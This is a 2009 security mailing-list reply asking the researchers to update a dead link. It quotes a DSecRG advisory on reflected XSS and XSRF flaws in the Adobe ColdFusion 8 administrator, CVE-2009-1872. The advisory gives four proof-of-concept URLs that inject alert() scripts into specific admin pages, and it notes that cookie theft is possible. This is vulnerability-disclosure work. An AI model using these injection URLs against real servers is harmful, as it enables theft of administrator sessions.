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Date: Mon, 17 Aug 2009 11:25:55 -0400
From: Mike Duncan <Mike.Duncan@...a.gov>
To: research@...crg.com
Cc: bugtraq@...urityfocus.com, vuln@...unia.com,
	packet@...ketstormsecurity.org
Subject: Re: [DSECRG-09-022] Adobe Coldfusion 8 Multiple Linked XSS
 Vulnerabilies

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You mention the issues had been resolved and provide a link, but the
link seems dead now. Could you please update with a proper reference to
Adobe if possible with information on how these issues were resolved.

Thanks.

Mike Duncan
ISSO, Application Security Specialist
Government Contractor with STG, Inc.
NOAA :: National Climatic Data Center


research@...crg.com wrote:
> http://www.dsecrg.com/pages/vul/show.php?id=122
> 
> 
> Digital Security Research Group [DSecRG] Advisory       #DSECRG-09-022
> 
> Application:                    Adobe Coldfusion 8              
> Versions Affected:              Adobe Coldfusion 8
> Vendor URL:                     http://adobe.com
> Bugs:                           Multiple Linked XSS,XSRF
> Exploits:                       YES
> Reported:                       12.01.2009
> Vendor response:                13.01.2009
> Date of Public Advisory:        17.08.2009
> CVE-number:                     CVE-2009-1872
> Author:                         Alexander Polyakov
>                                 Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)
> 
> Description
> ***********
> 
> Multiple Linked XSS and XSRF vulnerabilities found in Adobe Coldfusion Server 8. Attacker can create evil link and steal administrators cookie
> 
> 
> Details
> *******
> 
> 1. Multiple Linked XSS vulnerabilities found in Adobe Coldfusion Server 8. 
> 
> 
> 1.1 Linked XSS vulnerability found in script searchlog.cfm. vulnerable parameter startRow
> 
> 
> Example
> *******
> 
> http://localhost:8500/CFIDE/administrator/logviewer/searchlog.cfm?viewShort=0&sortBy=&filter=CurrentFilter&startRow=22%22%20%20STYLE=%22background-image:url(javascript:alert(%27%DF%20%E7%E4%E5%F1%FC%20%E1%FB%EB%27))%22%3E
> 
> 1.2 Linked XSS vulnerability found in script _logintowizard.cfm. Attacker can inject XSS in url string
> 
> 
> Example
> *******
> http://localhost:8500/CFIDE/wizards/common/_logintowizard.cfm?>'"><script>alert('DSECRG_XSS')</script>
> 
> 
> 1.3 Linked XSS vulnerability found in script _authenticatewizarduser.cfm. Attacker can inject XSS in url string
> 
> Example
> *******
> http://localhost:8500/CFIDE/wizards/common/_authenticatewizarduser.cfm?>'"><script>alert('DSECRG_XSS')</script>
> 
> 
> 1.4 Linked XSS vulnerability found in script _authenticatewizarduser.cfm.Attacker can inject XSS in url string
> 
> Example
> *******
> http://localhost:8500/CFIDE/administrator/enter.cfm?>'"><script>alert('DSECRG_XSS')</script>
> 
> 
> 
> Fix Information
> ***************
> The issue has been solved 17 august 2009.  http://www.adobe.com/go/apsb09-12
> 
> 
> References:
> ***********
> 
> http://www.adobe.com/go/apsb09-12
> http://www.dsecrg.com/pages/vul/show.php?id=122
> 
> 
> About
> *****
> 
> 
> Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
> 
> 
> Contact:        research [at] dsecrg [dot] com
>                 http://www.dsecrg.com 
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